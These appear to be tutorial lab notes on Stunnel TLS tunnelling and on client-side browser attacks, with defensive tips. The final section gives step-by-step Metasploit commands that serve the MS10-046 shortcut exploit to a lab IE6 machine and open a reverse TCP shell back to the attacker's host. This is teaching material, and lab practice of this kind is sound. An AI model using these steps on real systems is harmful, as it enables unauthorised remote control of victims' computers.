If you want to send a protected message across a computer network and be sure that, if it is intercepted by an unwanted recipient, it cannot be read or tampered with, then you need to add network encryption.
SSL (Secure Sockets Layer) and its successor TLS (Transport Layer Security) are protocols that function at the Application Layer of the TCP/IP Model, above the Transport Layer, and provide security certificates, public and private key exchange (asymmetric cryptography), and encryption.
Stunnel
Stunnel is a program that can wrap unencrypted traffic in SSL/TLS encryption and forward it to a specified service or port. Stunnel can be configured to accept packets on an incoming port, encrypt that traffic with SSL or TLS encryption, and then forward the encrypted packets to another specified destination IP address and port. Stunnel uses OpenSSL to encrypt network traffic.
Lab Demo
In this demo, I will use Stunnel to send a secure communication between two clients, both running Stunnel. Client A will run Stunnel in client mode and Client B will be running Stunnel in server mode (see below).
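A minimal pair of configuration files for the client-mode/server-mode setup described above. This is an added example, not the configuration used in the original demo: the addresses, ports, service name and file names are constructed placeholders, and the option names follow stunnel 5.x (older 4.x releases use `verify = 2` in place of `verifyChain`). Stunnel does not verify the peer certificate unless told to, so the client side enables verification explicitly; without it the tunnel is encrypted but the client cannot tell Client B from an interceptor.

```ini
; ---- Client B: stunnel.conf (server mode) ----
; Constructed example: all addresses, ports and file names are placeholders.

; Certificate presented to connecting clients, and its private key.
; Keep the key file readable only by the account stunnel runs as.
cert = server-cert.pem
key = server-key.pem

[demo]
; TLS listener that Client A connects to.
accept = 4433
; Plaintext service on Client B that receives the decrypted traffic.
connect = 127.0.0.1:8080


; ---- Client A: stunnel.conf (client mode) ----
; Constructed example: all addresses, ports and file names are placeholders.

[demo]
; Accept plaintext locally and speak TLS on the outbound side.
client = yes
; Local applications connect here; bound to loopback so that other
; hosts cannot use this machine as an entry point into the tunnel.
accept = 127.0.0.1:8080
; Client B's stunnel listener.
connect = 192.0.2.20:4433
; CA certificate (or the server's self-signed certificate) to trust.
CAfile = ca-cert.pem
; Refuse servers whose certificate does not chain to CAfile.
verifyChain = yes
; Also require the certificate to name the host being contacted.
checkHost = clientb.example
```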
Video Tutorials
In the video tutorials below, I demonstrate step by step the entire process of getting Stunnel to work between a BackTrack Linux client and a Windows XP Pro client.
Client-side exploits are an extremely common form of attack. A typical scenario is that an attacker compromises an ecommerce website and then uses that website as a proxy to launch attacks on unsuspecting website visitors.
How many of us have received viruses from a malicious webpage or website? More often than not, the owner of the website does not know that the website contains malicious code that is attacking its visitors. In these scenarios the target of the exploit is the user's web browser.
The role of the web browser has expanded with the role of the web. Web browsers today are required to do much more than present static text and images: they process ecommerce transactions, interact with databases, launch media players, and transfer files. The web and the web browser were not designed with security in mind, which makes the web browser an opportune target for attacks.
Client-side Defense
So how do you protect yourself and your browser from a client-side attack? Here is a list of best practices to protect against client-side attacks:
Update and run an antivirus program and an antispyware program.
Update your operating system and web browsers on a regular basis.
Update media players (e.g. Flash, QuickTime), readers (e.g. Acrobat), and add-ons regularly.
Update Java.
Do not visit nefarious websites (e.g. sites that deal with pirated music and warez).
Do not surf the web as an administrator: make sure User Account Control (UAC) is enabled in Vista or Windows 7. Windows XP users can use the program Drop My Rights to achieve the same result.
Client-side Attack
In the video tutorial below, a client-side exploit is tested against a lab computer running Windows XP Pro and Internet Explorer 6. In order to facilitate the attack, I use Metasploit to launch a webserver and serve a malicious webpage to the visiting IE6 web browser.
Demo steps:
Launch msfconsole, load the exploit and payload, set the options, and launch the exploiting webserver and webpage. See the following commands:
1. #msfconsole
2. msf > search browser
3. msf > use windows/browser/ms10_046_shortcut_icon_dllloader
4. msf > show payloads
5. msf > set payload generic/shell_reverse_tcp
6. msf > show options
7. msf > set lhost <your ip address>
8. msf > set srvhost <your ip address>
9. msf > set srvport 80
10. msf > exploit
11. On your test client (victim computer), browse to your Metasploit server's IP address, launching the client-side attack.
12. Once the exploit has finished launching, list your sessions: msf > sessions -l
13. msf > sessions -i 1
14. You should now have a Windows shell to interact with.